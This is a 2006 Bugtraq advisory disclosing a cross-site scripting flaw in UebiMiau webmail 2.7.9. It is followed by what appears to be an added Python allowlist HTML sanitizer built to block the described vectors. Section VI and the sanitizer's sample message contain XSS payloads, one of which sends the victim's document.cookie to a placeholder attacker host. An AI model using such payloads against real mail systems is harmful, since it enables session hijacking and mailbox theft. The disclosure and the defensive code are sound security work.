Date: Sun, 29 Jan 2006 17:22:12 +0200
From: "M.Neset KABAKLI" <neset@...iza.com>
To: <bugtraq@...urityfocus.com>
Subject: UebiMiau Webmail System Security Vulnerability



I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability


II.Vendor
Aldoir Ventura 


III.Affected Systems
* UebiMiau 2.7.9 (latest release) and probably previous versions.


IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without depending on any extra PHP modules or a database
(http://www.uebimiau.org).


V.Description
UebiMiau does not filter HTML e-mail messages correctly, so it is possible to
inject malicious script into an e-mail. An attacker can hijack a user's
session and access the victim's mailbox just by sending a specially crafted
e-mail message.

This is dangerous because in some cases no link needs to be clicked: the
client-side code executes as soon as the user opens the crafted e-mail.


VI.Exploit
<img src="javascript:location.href='http://ATTACKER/StealSessionData/?'+document.cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test link 1</a>
<a href='http://ATTACKER/StealData/'>test link 2</a>


VII.Vulnerability Status
* Vulnerability discovered on 2006-01-12.
* Vendor notified on 2006-01-12.
* No response from vendor, vulnerability published on 2006-01-28.


VIII.Workarounds
* No vendor-supplied patch is currently available.
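
Added illustration, not from the advisory or the UebiMiau vendor: the kind of
allowlist-based HTML filtering a webmail reader needs for the vectors in section
VI, written in Python on the standard library. It rebuilds the message from an
allowlist of tags and attributes and rejects every href/src whose scheme is not
http, https or mailto, after entity-decoding and stripping the control
characters browsers ignore inside a scheme. Tag names, attribute sets and the
sample message are my own constructed choices; ATTACKER is a placeholder host.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist for rendering untrusted mail: anything not listed (script, style, on* handlers, javascript: URLs) is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "div", "span", "ul", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
_CTRL = re.compile(r"[\x00-\x20\x7f]")  # whitespace/control bytes browsers ignore inside a scheme
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")

def safe_url(value):
    # Entity-decode and strip control chars first, so "java&#09;script:" is recognised as javascript:
    m = _SCHEME.match(_CTRL.sub("", html.unescape(value)))
    return m is None or m.group(1).lower() in SAFE_SCHEMES  # scheme-less (relative) URLs pass

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out, self.drop_depth = [], 0  # drop_depth > 0: inside <script>/<style>, drop text too
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.drop_depth += 1
        elif tag in ALLOWED_TAGS:  # unknown elements lose their tag but keep their text
            kept = ""
            for name, value in attrs:
                value = value or ""
                if name not in ALLOWED_ATTRS.get(tag, set()):
                    continue  # also drops onerror=, onload=, style=
                if name in ("href", "src") and not safe_url(value):
                    continue  # the advisory's <img src="javascript:..."> vector is rejected here
                kept += f' {name}="{html.escape(value, quote=True)}"'
            self.out.append(f"<{tag}{kept}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.drop_depth = max(0, self.drop_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in ("br", "img"):  # void elements get no closing tag
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data))
def sanitize_mail_html(body):
    p = MailSanitizer()
    p.feed(body)
    p.close()  # flush text buffered by convert_charrefs
    return "".join(p.out)
# Constructed sample message reusing the advisory's payload shapes (ATTACKER is a placeholder host).
SAMPLE_MAIL = ("<p>Hi</p><img src=\"javascript:location.href='http://ATTACKER/StealSessionData/?'+document.cookie;\" />"
               "<a href=\"jAvAsCrIpT:alert(1)\">test link 1</a><a href='http://ATTACKER/StealData/'>test link 2</a>"
               "<img src=\"&#106;ava&#09;script:alert(1)\" onerror=\"alert(1)\"><script>alert(1)</script>")
```

Note that "test link 2" survives because its scheme is plain http; a sanitizer
cannot tell a phishing link from a legitimate one, so that vector is left to the
user and to link rewriting or warning banners, not to the HTML filter.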


IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies 
neset{at}wakiza{dot}com
www.wakiza.com


